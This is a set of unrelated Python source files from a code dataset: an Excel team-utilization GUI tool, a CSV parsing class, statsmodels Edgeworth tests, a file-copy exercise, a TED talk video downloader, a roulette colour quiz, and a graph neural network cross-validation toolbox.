m_row=sheet.max_row
for i in range(4,m_row+1):
cell_obj=sheet.cell(i,4)
emp_id.append(cell_obj.value)
print(emp_id)
wb1=openpyxl.load_workbook(leave_projection)
sheet1=wb1[month_name]
##sheet1=wb1.sheetnames
##print(sheet1)
m_row1=sheet1.max_row - 4
dontCare=["L","wo","HL"]
input_counter=13
data_input=wb["Data Input"]
for i in range(6,m_row1):
empid=sheet1.cell(i,4).value
if empid in emp_id:
#print(empid)
#print(emp_id.index(empid))
for j in range(6,day+6): #Day is last day of month
value1=sheet1.cell(i,j).value
if value1 in dontCare:
if value1=="L":
redfill=openpyxl.styles.fills.PatternFill(fill_type="solid",fgColor='00ff0000')
cell=data_input.cell(emp_id.index(empid)+7,input_counter)
cell.value=0
cell.fill=redfill
#font =openpyxl.styles.Font(name='Calibri',bold=False,size=11,color='00FFFF00')
#cell.font=font
if value1=="HL":
#redfill=openpyxl.styles.PatternFill(fill_type="solid",fgColor='00383635')
cell=data_input.cell(emp_id.index(empid)+7,input_counter)
cell.value=" "
#cell.fill=redfill
#font =openpyxl.styles.Font(name='Calibri',bold=True,size=11,color='00FFFF00')
#cell.font=font
if value1=="wo":
cell=data_input.cell(emp_id.index(empid)+7,input_counter)
cell.value=" "
#font =openpyxl.styles.Font(name='Calibri',bold=False,size=11,color='00000000')
#cell.font=font
input_counter+=1
else:
cell=data_input.cell(emp_id.index(empid)+7,input_counter)
cell.value=8.5
input_counter+=1
input_counter=13
wb.save(team_utilization)
message = Message(datafield, text="Task Completed Now You Can Close the Window", relief=RIDGE,aspect=1000,anchor=W,bg="#fff",justify=CENTER )
message.grid(row=5,column=1)
#destroy after 20 seconds
datafield.after(20000,lambda: datafield.destroy())
os.startfile(input_data)
os.startfile(team_utilization)
os.startfile(leave_projection)
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
#Tkinter GUI Code Starts
root = Tk()
root.withdraw()
datafield=Tk()
datafield.title("Team Management System")
currentDir=os.getcwd()
#Path of excel files
##input_data=''
##team_utilization=''
##leave_projection=''
##month_name=''
##def printing_data():
## print(input_data)
## print(team_utilization)
## print(leave_projection)
## print(month_name)
## CSV file is Employee's monthly attendance data mmyyyy.csv
def filenamecsv(arg=None):
root.filename=filedialog.askopenfilename(initialdir= currentDir ,title= "Select MyWorld csv File",filetypes=(("CSV files","*.csv"),("all files","*.*")))
global input_data
input_data=root.filename
#print (root.filename)
filePath=ntpath.basename(root.filename)
print(filePath)
lbpath=Label(datafield,text=filePath,anchor=W,bg="#fff",justify=LEFT,width=50,relief=RIDGE,padx=2)
lbpath.grid(row=0,column=1)
lbpath.config(text=filePath)
## Utilization_file.xlsx where the output is been fed is in this Excel Workbook. End Sheet affected are "Utilization field"
def filenamexlsx(arg=None):
root.filename=filedialog.askopenfilename(initialdir= currentDir ,title= "Select Team Utilization Excel File",filetypes=(("Excel files","*.xlsx"),("all files","*.*")))
global team_utilization
team_utilization=root.filename
#print (root.filename)
filePath=ntpath.basename(root.filename)
print(filePath)
lbpath=Label(datafield,text=filePath,anchor=W,bg="#fff",justify=LEFT,width=50,relief=RIDGE,padx=2)
lbpath.grid(row=1,column=1)
def callback(selection):
#It has the return value/ selected value from the Option Menu
global month_name
month_name=selection
#print(selection)
lbpath=Label(datafield,text=selection,anchor=W,bg="#fff",justify=LEFT,width=50,relief=RIDGE,padx=2)
lbpath.grid(row=3,column=1)
#printing_data()
def filenamexlsx1(arg=None):
root.filename=filedialog.askopenfilename(initialdir= currentDir ,title= "Select Leave Plan Excel File",filetypes=(("Excel File","*.xlsx"),("all files","*.*")))
global leave_projection
leave_projection=root.filename
#print (root.filename)
filePath=ntpath.basename(root.filename)
print (filePath)
lbpath=Label(datafield,text=filePath,anchor=W,bg="#fff",justify=LEFT,width=50,relief=RIDGE,padx=2)
lbpath.grid(row=2,column=1)
wb=openpyxl.load_workbook(root.filename)
sheet=wb.sheetnames
variable = StringVar(datafield)
variable.set("Select Month")
w = OptionMenu(datafield,variable,*sheet,command=callback)
w.grid(row=3,column=2)
#myEntry=Entry(datafield,width=20)
##myEntry.focus()
##myEntry.bind("<Return>",returnEntry)
##myEntry.grid(row=0,column=1)
##
##enterEntry=Button(datafield,text="Enter",command=returnEntry)
##enterEntry.grid(row=0,column=4)
####### Left side Labels #############
L1 = Label(datafield, text = "MyWorld Data.csv")
L1.grid(row=0,column=0)
#L1.pack(side = LEFT)
L2 = Label(datafield, text = "Temp Utilization.xlsx")
L2.grid(row=1,column=0)
L3 =Label(datafield, text = "Leave Plan.xlsx")
L3.grid(row=2,column=0)
L4 =Label(datafield, text = "Select Sheet Name")
L4.grid(row=3,column=0)
####### Buttons #######
B1 = Button(datafield, text="Browse", command=filenamecsv)
B1.grid(row=0,column=2)
B2 = Button(datafield, text="Browse", command=filenamexlsx)
B2.grid(row=1,column=2)
B3 = Button(datafield, text="Browse", command=filenamexlsx1)
B3.grid(row=2,column=2)
B3 = Button(datafield, text="Start", command=automation_logic)
B3.grid(row=4,column=1)
lbpath=Label(datafield,text=" ",anchor=W,bg="#fff",justify=LEFT,width=50,relief=RIDGE,padx=2)
lbpath.grid(row=0,column=1)
lbpath1=Label(datafield,text=" ",anchor=W,bg="#fff",justify=LEFT,width=50,relief=RIDGE,padx=2)
lbpath1.grid(row=1,column=1)
lbpath2=Label(datafield,text=" ",anchor=W,bg="#fff",justify=LEFT,width=50,relief=RIDGE,padx=2)
lbpath2.grid(row=2,column=1)
root.mainloop()
datafield.mainloop()
##looper=1
##while looper:
## if month_name!='':
## looper=0
#print("Outside Loop")
#######
| true |
af0a7de1dffa00128d4e088ba82c721de62708be | Python | Nazawrius/Lab5 | /Info.py | UTF-8 | 1,389 | 3.25 | 3 | [] | no_license | from containers import Student, Date, Try
class Info:
def __init__(self, Csv):
self._problems = dict()
self._entries = 0
for row in Csv:
self._entries += 1
description = row[7]
if description not in self._problems:
self._problems[description] = Problem(description)
self._problems[description].add_try(row)
@property
def entries(self):
return self._entries
@property
def problems(self):
return self._problems
class Problem:
def __init__(self, description):
description_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" -.,_{}$+*\\()%[]'
if 4 <= len(description) <= 68 and all((ch in description_chars for ch in description)) and \
description.strip() == description:
self._description = description
else:
raise Exception(1)
self._tries = list()
def add_try(self, row):
date = Date(row[1], row[3], row[6])
name = Student(row[5], row[4], row[0])
percent = row[2]
try_ = Try(name, date, self._description, percent)
self._tries.append(try_)
@property
def description(self):
return self._description
@property
def tries(self):
return self._tries
| true |
329eb8efe793b0ff7b05cd66b5cff7ff897983cd | Python | statsmodels/statsmodels | /statsmodels/distributions/tests/test_edgeworth.py | UTF-8 | 6,416 | 2.703125 | 3 | [
"BSD-3-Clause"
] | permissive |
import warnings
import numpy as np
from numpy.testing import (assert_equal, assert_raises,
assert_allclose)
import numpy.testing as npt
from scipy.special import gamma, factorial, factorial2
import scipy.stats as stats
from statsmodels.distributions.edgeworth import (_faa_di_bruno_partitions,
cumulant_from_moments, ExpandedNormal)
class TestFaaDiBruno:
def test_neg_arg(self):
assert_raises(ValueError, _faa_di_bruno_partitions, -1)
assert_raises(ValueError, _faa_di_bruno_partitions, 0)
def test_small_vals(self):
for n in range(1, 5):
for ks in _faa_di_bruno_partitions(n):
lhs = sum(m * k for (m, k) in ks)
assert_equal(lhs, n)
def _norm_moment(n):
# moments of N(0, 1)
return (1 - n % 2) * factorial2(n - 1)
def _norm_cumulant(n):
# cumulants of N(0, 1)
try:
return {1: 0, 2: 1}[n]
except KeyError:
return 0
def _chi2_moment(n, df):
# (raw) moments of \chi^2(df)
return (2**n) * gamma(n + df/2.) / gamma(df/2.)
def _chi2_cumulant(n, df):
assert n > 0
return 2**(n-1) * factorial(n - 1) * df
class TestCumulants:
def test_badvalues(self):
assert_raises(ValueError, cumulant_from_moments, [1, 2, 3], 0)
assert_raises(ValueError, cumulant_from_moments, [1, 2, 3], 4)
def test_norm(self):
N = 4
momt = [_norm_moment(j+1) for j in range(N)]
for n in range(1, N+1):
kappa = cumulant_from_moments(momt, n)
assert_allclose(kappa, _norm_cumulant(n),
atol=1e-12)
def test_chi2(self):
N = 4
df = 8
momt = [_chi2_moment(j+1, df) for j in range(N)]
for n in range(1, N+1):
kappa = cumulant_from_moments(momt, n)
assert_allclose(kappa, _chi2_cumulant(n, df))
class TestExpandedNormal:
def test_too_few_cumulants(self):
assert_raises(ValueError, ExpandedNormal, [1])
def test_coefficients(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', RuntimeWarning)
# 3rd order in n**(1/2)
ne3 = ExpandedNormal([0., 1., 1.])
assert_allclose(ne3._coef, [1., 0., 0., 1./6])
# 4th order in n**(1/2)
ne4 = ExpandedNormal([0., 1., 1., 1.])
assert_allclose(ne4._coef, [1., 0., 0., 1./6, 1./24, 0., 1./72])
# 5th order
ne5 = ExpandedNormal([0., 1., 1., 1., 1.])
assert_allclose(ne5._coef, [1., 0., 0., 1./6, 1./24, 1./120,
1./72, 1./144, 0., 1./1296])
# adding trailing zeroes increases the order
ne33 = ExpandedNormal([0., 1., 1., 0.])
assert_allclose(ne33._coef, [1., 0., 0., 1./6, 0., 0., 1./72])
def test_normal(self):
# with two cumulants, it's just a gaussian
ne2 = ExpandedNormal([3, 4])
x = np.linspace(-2., 2., 100)
assert_allclose(ne2.pdf(x), stats.norm.pdf(x, loc=3, scale=2))
def test_chi2_moments(self):
# construct the expansion for \chi^2
N, df = 6, 15
cum = [_chi2_cumulant(n+1, df) for n in range(N)]
with warnings.catch_warnings():
warnings.simplefilter("ignore", RuntimeWarning)
ne = ExpandedNormal(cum, name='edgw_chi2')
# compare the moments
assert_allclose([_chi2_moment(n, df) for n in range(N)],
[ne.moment(n) for n in range(N)])
# compare the pdf [fragile!]
# this one is actually not a very good test: there is, strictly
# speaking, no guarantee that the pdfs match point-by-point
# m, s = df, np.sqrt(df)
# x = np.linspace(m - s, m + s, 10)
# assert_allclose(ne.pdf(x), stats.chi2.pdf(x, df),
# atol=1e-4, rtol=1e-5)
# pdf-cdf roundtrip
check_pdf(ne, arg=(), msg='')
# cdf-ppf roundtrip
check_cdf_ppf(ne, arg=(), msg='')
# cdf + sf == 1
check_cdf_sf(ne, arg=(), msg='')
# generate rvs & run a KS test
np.random.seed(765456)
rvs = ne.rvs(size=500)
check_distribution_rvs(ne, args=(), alpha=0.01, rvs=rvs)
def test_pdf_no_roots(self):
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
ne = ExpandedNormal([0, 1])
ne = ExpandedNormal([0, 1, 0.1, 0.1])
def test_pdf_has_roots(self):
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
assert_raises(RuntimeWarning, ExpandedNormal, [0, 1, 101])
## stolen verbatim from scipy/stats/tests/test_continuous_extra.py
DECIMAL = 8
def check_pdf(distfn, arg, msg):
# compares pdf at median with numerical derivative of cdf
median = distfn.ppf(0.5, *arg)
eps = 1e-6
pdfv = distfn.pdf(median, *arg)
if (pdfv < 1e-4) or (pdfv > 1e4):
# avoid checking a case where pdf is close to zero
# or huge (singularity)
median = median + 0.1
pdfv = distfn.pdf(median, *arg)
cdfdiff = (distfn.cdf(median + eps, *arg) -
distfn.cdf(median - eps, *arg))/eps/2.0
# replace with better diff and better test (more points),
# actually, this works pretty well
npt.assert_almost_equal(pdfv, cdfdiff,
decimal=DECIMAL, err_msg=msg + ' - cdf-pdf relationship')
def check_cdf_ppf(distfn, arg, msg):
values = [0.001, 0.5, 0.999]
npt.assert_almost_equal(distfn.cdf(distfn.ppf(values, *arg), *arg),
values, decimal=DECIMAL, err_msg=msg + ' - cdf-ppf roundtrip')
def check_cdf_sf(distfn, arg, msg):
values = [0.001, 0.5, 0.999]
npt.assert_almost_equal(distfn.cdf(values, *arg),
1. - distfn.sf(values, *arg),
decimal=DECIMAL, err_msg=msg +' - sf+cdf == 1')
def check_distribution_rvs(distfn, args, alpha, rvs):
## signature changed to avoid calling a distribution by name
# test from scipy.stats.tests
# this version reuses existing random variables
D,pval = stats.kstest(rvs, distfn.cdf, args=args, N=1000)
if (pval < alpha):
D,pval = stats.kstest(distfn.rvs, distfn.cdf, args=args, N=1000)
npt.assert_(pval > alpha, "D = " + str(D) + "; pval = " + str(pval) +
"; alpha = " + str(alpha) + "\nargs = " + str(args))
| true |
8de4847f8cb9f11ec8053cdfd02dbde0690c8497 | Python | cdesisto/lpthw | /Exercise17/ex17_drills2.py | UTF-8 | 1,536 | 3.78125 | 4 | [] | no_license | # Copied from ex17_drills.py to make this as short as possile
# Shortened to two lines!
from sys import argv
from os.path import exists
# 3 parts to run script
script, from_file, to_file = argv
# Tells the user what's going to happen (from_file and to_file come from argv
##print(f"Copying from {from_file} to {to_file}")
# we could do thsese two on one line, how?
# Opens file as read-only
##in_file = open(from_file)
# Loads the data into python
##indata = in_file.read()
# This line replaces the open and read lines in a single line - it opens and reads!
indata = open(from_file).read()
# Prints the size of the file
##print(f"The input file is {len(indata)} bytes long")
# Tests to see if file exists - returns TRUE or FALSE
##print(f"Does the output file exist? {exists(to_file)}")
# Sets the user up for the input
##print("Ready, hit RETURN to continue, CTRL-C to abort.")
# Input prompt with empty string
##input()
# Opens the output file with write access
##out_file = open(to_file, 'w')
# Writes out the file using the data stored from the input file
##out_file.write(indata)
# Here I will try to make the open output and write output files in one lines
out_file = open(to_file, 'w').write(indata)
# Sends the user a message
#print("Alright, all done.")
# Close yer files!
# Commented out the following line because out_file is not opened because the script was shortened
##out_file.close()
# Commented out the following line because in_file is never actually opened because the script was shortened
##in_file.close()
| true |
2a757b99415fe55c5157919859480460463f7f15 | Python | denisdickson/python_automation_tutorial_freecamporg | /tedtalks_downloader.py | UTF-8 | 1,121 | 2.765625 | 3 | [] | no_license | #!Python3
# Importa conteúdo da página do tedtalk
import requests
# webscrapping
from bs4 import BeautifulSoup
# regular expression pattern matchin
import re
# from urllib.request import urlretrieve #downloading mp4
# for argument parsing
import sys
# ExceptionHandling
if len(sys.argv) > 1:
url = sys.argv[1]
else:
sys.exit("Error: Please enter the TED Talk URL")
#
#
# sends get requests to get content of url and store in object r
r = requests.get(url)
print("Download's about to start")
soup = BeautifulSoup(r.content, features="lxml")
for val in soup.findAll("script"):
if(re.search("talkPage.init", str(val))) is not None:
result = str(val)
result_mp4 = re.search("(?P<url>https?://[^\s]+)(mp4)", result).group("url")
mp4_url = result_mp4.split('"')[0]
print("Downloading videom from "+mp4_url)
file_name = mp4_url.split("/")[len(mp4_url.split("/"))-1].split('?')[0]
print("Storing video in ... "+file_name)
r = requests.get(mp4_url)
with open(file_name, 'wb') as f:
f.write(r.content)
# alternate method
#urlretrieve(mp4, url, file_name)
print("Download process finished")
| true |
c277aeb945bb85e03da2236bdd54fc0dccf874de | Python | Pasachhe/beambalance | /balance.py | UTF-8 | 812 | 3.1875 | 3 | [] | no_license | from tkinter import *
from beam import *
class Game:
def __init__(self, gameWidth, gameHeight):
self.root = Tk()
self.gameWidth = gameWidth
self.gameHeight = gameHeight
self.gameWindow()
self.beam = beam(self.canvas, x=self.gameWidth / 2,y=self.gameHeight / 2, width=50, height=50, turnspeed=10)
self.root.bind('<Left>', self.beam.rotate)
self.root.bind('<Right>', self.beam.rotate)
self.root.mainloop()
def gameWindow(self):
self.frame = Frame(self.root)
self.frame.pack(fill=BOTH, expand=YES)
self.canvas = Canvas(self.frame,width=self.gameWidth, height=self.gameHeight, bg="purple", takefocus=1)
self.canvas.pack(fill=BOTH, expand=YES)
asteroids = Game(600,600)
| true |
283a8ab3ebc7dff5d4056886099335bd3d4d7105 | Python | NeoWhiteHatA/all_my_python | /march/win_color.py | UTF-8 | 689 | 3.546875 | 4 | [] | no_license | sota = int(input('Введите цифру или число от 0 до 36:'))
if sota == 0:
print('green')
elif sota >= 1 and sota <= 10 and sota // 2 == 0:
print('red')
elif sota >= 1 and sota <= 10 and sota // 2 != 0:
print('black')
elif sota >= 11 and sota <= 18 and sota // 2 == 0:
print('black')
elif sota >= 11 and sota <= 18 and sota // 2 != 0:
print('red')
elif sota >= 19 and sota <= 28 and sota // 2 == 0:
print('red')
elif sota >= 19 and sota <= 28 and sota // 2 != 0:
print('black')
elif sota >= 29 and sota <= 36 and sota // 2 ==0:
print('black')
elif sota >= 29 and sota <= 36 and sota // 2 != 0:
print('red')
else:
print('error')
| true |
f02ba1bc8d65010739c5a880c78fa12becf11ea8 | Python | cracer/graph-classification-TF2-toolbox | /toolbox/main.py | UTF-8 | 18,291 | 2.546875 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
""" main.py
Created on 17-02-21
@author: Pierre-François De Plaen
"""
# Import Python modules
import os
import re
from random import randint
# Remove TensorFlow information messages
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['TF_CPP_MIN_VLOG_LEVEL'] = '3'
# Import TensorFlow and Pandas
import tensorflow as tf
import pandas as pd
# Import the toolbox
from utils import *
from fit import fit
# Graph Convolutional Network (GCN)
from methods.GCN.models import GCN
import methods.GCN.params as GCNparams
import methods.GCN.utils as GCNutils
# Diffusion Convolutional Neural Network (DCNN)
from methods.DCNN.models import DCNN
import methods.DCNN.params as DCNNparams
import methods.DCNN.utils as DCNNutils
# Graph Wavelet Neural Network (GWNN)
from methods.GWNN.models import GWNN
import methods.GWNN.params as GWNNparams
import methods.GWNN.utils as GWNNutils
def validate_model(model_name, model_info, dataset_name, verbose=1, location=None):
"""
Run 10 times with 5 folds the model passed in argument on the datset passed in argument.
All combinations of the params_range are run, the best results are saved in the folder *location*
:param model_name: (str) name of the model
:param model_info: (dict) dictionary with the information about the model (params_range, params_fct, utils_fct and function)
:param dataset_name: (str) dataset path, datasets must be stored in data/datasets/DATASET_NAME/...
:param verbose: (int) verbosity for the execution
:param location: (str) string with the folder location for saving the results. Creates a new random folder if None
:return: /
"""
### Create the directory for saving the results if it doesn't exist yet ###
if location is None:
location = str(randint(1000, 9999))
save_directory = os.path.dirname(os.path.abspath(__file__)) + '/results/' + location + '/'
if not os.path.exists(save_directory):
os.makedirs(save_directory)
### Initialize the parameters ###
params_range = model_info['params_range']
model_params = model_info['params_fct']
model_utils = model_info['utils_fct']
model_func = model_info['function']
params_key = list(params_range.keys())
n_params = len(params_key)
keys_stats = ['train_acc', 'valid_acc', 'test_acc', 'epoch']
grid_dim = tuple([len(val) for val in params_range.values()])
### Save results in a Pandas DataFrame ###
column_names = ['run_id'] + keys_stats + params_key
runs_results = pd.DataFrame(columns=column_names)
### Cross-validation: 10 runs of 5 folds ###
runs = load_cross_validation_run(dataset_name) # load all runs index associated to the given dataset
best_params_occ = np.zeros(grid_dim)
n_runs = len(runs)
global_stats_params = [None] * n_runs
for i in range(n_runs):
if verbose > 0:
print("RUN : " + str(i))
run = runs[i]
t_v_fold_index = run['sub_fold']
test_index = run['test']
n_fold = len(t_v_fold_index)
stats_params = [None] * n_fold
for j in range(n_fold):
if verbose > 0:
print("FOLD : " + str(j))
folds = [k for k in range(n_fold)]
folds.remove(j)
train_index = sum([t_v_fold_index[z] for z in folds], [])
val_index = t_v_fold_index[j]
stat_params = build_dict(keys_stats, grid_dim)
def loop(dataset_name, train_index, val_index, test_index, grid_dim, stats_params, params_range, params_key,
level, params_value, index):
if level == n_params:
# fit the model
if verbose > 0:
print(f"Parameters: {params_value}")
result = fit(dataset_name, train_index, val_index, test_index, model_params, model_utils, model_func, params_value=params_value, verbose=verbose)
stats_params = save_dict(stat_params, result, tuple(index))
else:
for i_level in range(grid_dim[level]):
key = params_key[level]
params_value[key] = params_range[key][i_level]
index[level] = i_level
loop(dataset_name, train_index, val_index, test_index, grid_dim, stats_params, params_range,
params_key, level + 1, params_value, index)
params_value = build_dict(params_key)
loop(dataset_name, train_index, val_index, test_index, grid_dim, stats_params, params_range, params_key, 0,
params_value, [0 for i in range(n_params)])
stats_params[j] = stat_params
# mean performance for each params on all folds
mean_stats_params = merge_dicts(stats_params, np.mean)
global_stats_params[i], best_params_index, best_params = get_best_params(mean_stats_params, params_range,
ref_key='valid_acc')
best_params_occ[best_params_index] += 1
runs_results.loc[len(runs_results)] = [str(i)] + list(global_stats_params[i].values()) + list(best_params.values())
# mean and std of performance over all runs
mean_global_stats_params = merge_dicts(global_stats_params, np.mean)
std_global_stats_params = merge_dicts(global_stats_params, np.std)
# best params (most of occurrences)
best_params_occ /= n_runs
best_params_index = max_array_index(best_params_occ)
best_params_mode = best_params_occ[tuple(best_params_index)]
best_params = get_params(best_params_index, params_range)
### Save DataFrame to file ###
runs_results.loc[len(runs_results)] = ['MEAN'] + list(mean_global_stats_params.values()) + [None for _ in range(len(best_params))]
runs_results.loc[len(runs_results)] = ['STD'] + list(std_global_stats_params.values()) + [None for _ in range(len(best_params))]
if verbose > 0:
print(runs_results)
csv_name = "{}_{}.csv".format(dataset_name, model_name)
aw = 'a' if os.path.exists(save_directory+csv_name) else 'w'
with open(save_directory+csv_name, aw) as f:
f.write("-- Parameters range: \n")
for p_name, p_vals in params_range.items():
f.write(f"{p_name} ; {[v for v in p_vals]}\n")
f.write("\n")
f.write("-- Best parameters: \n") # best params (most of occurences)
best_params_occ /= n_runs
best_params_index = max_array_index(best_params_occ)
best_params = get_params(best_params_index, params_range)
for p_name, p_val in best_params.items():
f.write(f"{p_name} ; {p_val}\n")
f.write(f"mode ; {best_params_occ[tuple(best_params_index)]}\n\n")
f.write("-- Run details: \n")
runs_results.to_csv(f, index=False, sep=';', line_terminator='\n')
f.write("\n")
f.close()
return mean_global_stats_params, std_global_stats_params, best_params, best_params_mode
def compute_parameter_influence(model_name, model_info, dataset_name, verbose=1, location=None):
"""
Run 10 times with 5 folds the model passed in argument on the datset passed in argument.
All results (runs & folds, for each parameter) are saved in the folder *location*
:param model_name: (str) name of the model
:param model_info: (dict) dictionary with the information about the model (params_range, params_fct, utils_fct and function)
parameters_range must contain only one value per parameter, except for the first one
:param dataset_name: (str) dataset path, datasets must be stored in data/datasets/DATASET_NAME/...
:param verbose: (int) verbosity for the execution
:param location: (str) string with the folder location for saving the results. Creates a new random folder if None
:return: /
"""
### Create the directory for saving the results if it doesn't exist yet ###
if location is None:
location = str(randint(1000, 9999))
save_directory = os.path.dirname(os.path.abspath(__file__)) + '/results/' + location + '/'
if not os.path.exists(save_directory):
os.makedirs(save_directory)
### Initialize the parameters ###
params_range = model_info['params_range']
model_params = model_info['params_fct']
model_utils = model_info['utils_fct']
model_func = model_info['function']
params_key = list(params_range.keys())
n_params = len(params_key)
keys_stats = ['train_acc', 'valid_acc', 'test_acc', 'epoch']
grid_dim = tuple([len(val) for val in params_range.values()])
### Save results in a Pandas DataFrame ###
column_names = ['run_id', 'fold_id', 'param_value'] + keys_stats
all_results = pd.DataFrame(columns=column_names)
varying_param_name = next(iter(params_range)) # get the parameter name
varying_param_values = params_range[varying_param_name]
del params_range[varying_param_name]
params_value = dict()
for key, value in params_range.items():
if len(value) > 0:
Exception(f"Parameters in 'params_range' must have only one value")
params_value[key] = value[0] # since there is only one value in the list
### Cross-validation: 10 runs of 5 folds ###
runs = load_cross_validation_run(dataset_name) # load all runs index associated to the given dataset
best_params_occ = np.zeros(grid_dim)
n_runs = len(runs)
for i in range(n_runs):
if verbose > 0:
print("RUN : " + str(i))
run = runs[i]
t_v_fold_index = run['sub_fold']
test_index = run['test']
n_fold = len(t_v_fold_index)
stats_params = [None] * n_fold
for j in range(n_fold):
if verbose > 0:
print("FOLD : " + str(j))
folds = [k for k in range(n_fold)]
folds.remove(j)
train_index = sum([t_v_fold_index[z] for z in folds], [])
val_index = t_v_fold_index[j]
stat_params = build_dict(keys_stats, grid_dim)
for val in varying_param_values:
params_value[varying_param_name] = val
# fit the model
if verbose > 0:
print(f"Parameters: {params_value}")
result = fit(dataset_name, train_index, val_index, test_index, model_params, model_utils, model_func, params_value=params_value, verbose=verbose)
all_results.loc[len(all_results)] = [str(i), str(j), str(val)] + list([el.numpy() if tf.is_tensor(el) else el for el in result.values()])
### Save DataFrame to file ###
if verbose > 0:
with pd.option_context('display.max_rows', None, 'display.max_columns', None):
print(all_results)
csv_name = "{}_{}.csv".format(dataset_name, model_name)
aw = 'a' if os.path.exists(save_directory+csv_name) else 'w'
with open(save_directory+csv_name, aw) as f:
f.write("-- Parameters range: \n")
f.write(f"{varying_param_name} ; {[v for v in varying_param_values]}\n")
for p_name, p_vals in params_range.items():
f.write(f"{p_name} ; {p_vals[0]}\n")
f.write("\n")
f.write("-- Run full details: \n")
all_results.to_csv(f, index=False, sep=';', line_terminator='\n')
f.write("\n")
f.close()
return all_results
def run_on_best_params(models, datasets, verbose=1, folder_path="/results/parameters_fitting/", location=None, get_param_influence=False):
"""
This function runs each model on each dataset passed in argument and uses the best parameters previously saved in folder_path
results are automatically saved in a .csv file
:param models: dictionary with all the models to run:
{
MODEL_1_NAME : {
'function': MODEL_1_FUNCTION_PATH,
'params_fct': MODEL_1_PARAMETERS_PATH,
'utils_fct': MODEL_1_UTILS_PATH,
'params_range': MODEL_1_DICT_OF_PARAMETERS_RANGES
},
MODEL_2_NAME : {...},
...
}
:param datasets: list of dataset paths (strings), datasets must be stored in data/datasets/DATASET_PATH/...
:param verbose: verbosity for the execution
:param folder_path: string with the relative path of the folder in which the parameters are saved
:param location: string with the folder location for saving the results. Creates a new random folder if None
:return: /
"""
if get_param_influence:
return_dict = dict()
for model_name, model_info in models.items():
if verbose > 0:
print(f"----- Training model: {model_name}")
for dataset in datasets:
if verbose > 0:
print(f" --- Dataset: {dataset}")
# find best params
model_info_full = model_info.copy()
dict_of_params = model_info["params_range"].copy()
save_directory = os.path.dirname(os.path.abspath(__file__)) + folder_path
csv_name = "{}_{}.csv".format(dataset, model_name)
with open(save_directory + csv_name, 'r') as f:
line = f.readline()
while line.strip() != "-- Best parameters:":
line = f.readline()
line = f.readline()
while re.search(r"mode", line) is None: # add parameters
line = line.replace(" ", "")
line = line.replace("\n", "")
sub = line.split(";")
if sub[0] not in dict_of_params.keys():
if sub[0] != 'activation':
data = int(sub[1]) if sub[1].isdigit() else float(sub[1])
dict_of_params[sub[0]] = [data]
else:
data = str(sub[1])
if 'sigmoid' in data:
activation = tf.nn.sigmoid
elif 'tanh' in data:
activation = tf.nn.tanh
elif 'relu' in data:
activation = tf.nn.relu
else:
NameError("Activation funcion not recognized")
dict_of_params['activation'] = [activation]
line = f.readline()
f.close()
model_info_full["params_range"] = dict_of_params
# run
if get_param_influence:
return_dict[dataset] = compute_parameter_influence(model_name, model_info_full, dataset_name=dataset, verbose=verbose, location=location)
else:
_,_,_,_ = validate_model(model_name, model_info_full, dataset_name=dataset, verbose=verbose, location=location)
if get_param_influence:
return return_dict
def run_experiments(models, datasets, verbose=1, location=None):
"""
This function runs each model on each dataset passed in argument, results are automatically saved in a .csv file
:param models: dictionary with all the models to run:
{
MODEL_1_NAME : {
'function': MODEL_1_FUNCTION_PATH,
'params_fct': MODEL_1_PARAMETERS_PATH,
'utils_fct': MODEL_1_UTILS_PATH,
'params_range': MODEL_1_DICT_OF_PARAMETERS_RANGES
},
MODEL_2_NAME : {...},
...
}
:param datasets: list of dataset paths (strings), datasets must be stored in data/datasets/DATASET_PATH/...
:param verbose: verbosity for the execution
:param location: string with the folder location for saving the results. Creates a new random folder if None
:return: /
"""
for model_name, model_info in models.items():
if verbose > 0:
print(f"----- Training model: {model_name}")
for dataset in datasets:
if verbose > 0:
print(f" --- Dataset: {dataset}")
mean_global_stats_params, std_global_stats_params, best_params, best_params_mode = validate_model(
model_name, model_info, dataset_name=dataset, verbose=verbose, location=location)
if verbose > 0:
print("\nRUN COMPLETE !")
if __name__ == '__main__':
"""
Fit and validate the main models (GCN, DCNN and GWNN)
using 10 runs with 5-fold-validation on multiple datasets
"""
datasets_list = ['mytexasA100Xsym', 'mywashingtonA100Xsym', 'mywisconsinA100Xsym', 'mycornellA100Xsym',
'myciteseerA100Xsym', 'mycoraA100Xsym', 'myfacebookA100X107', 'myfacebookA100X1684',
'myfacebookA100X1912', 'mywikipediaA100Xsym', 'myamazonphotoA100Xsym', 'myamazoncomputersA100Xsym']
models_to_run = {
'GWNN': {
'function': GWNN,
'params_fct': GWNNparams,
'utils_fct': GWNNutils,
'params_range': {'learning_rate': [0.001, 0.01],
'hidden_layer_sizes': [16, 32, 64],
'wavelet_s': [1 / 256, 1 / 64, 1 / 16, 1 / 4, 1 / 2, 1]}
},
'DCNN': {
'function': DCNN,
'params_fct': DCNNparams,
'utils_fct': DCNNutils,
'params_range': {'activation': [tf.nn.tanh],
'learning_rate': [0.001, 0.01],
'hops': [1, 2, 3]}},
'GCN': {
'function': GCN,
'params_fct': GCNparams,
'utils_fct': GCNutils,
'params_range': {'learning_rate': [0.001, 0.01],
'hidden_layer_sizes': [16, 32, 64]}
},
}
run_experiments(models_to_run, datasets_list[4:], verbose=1, location="parameters_fitting") | true |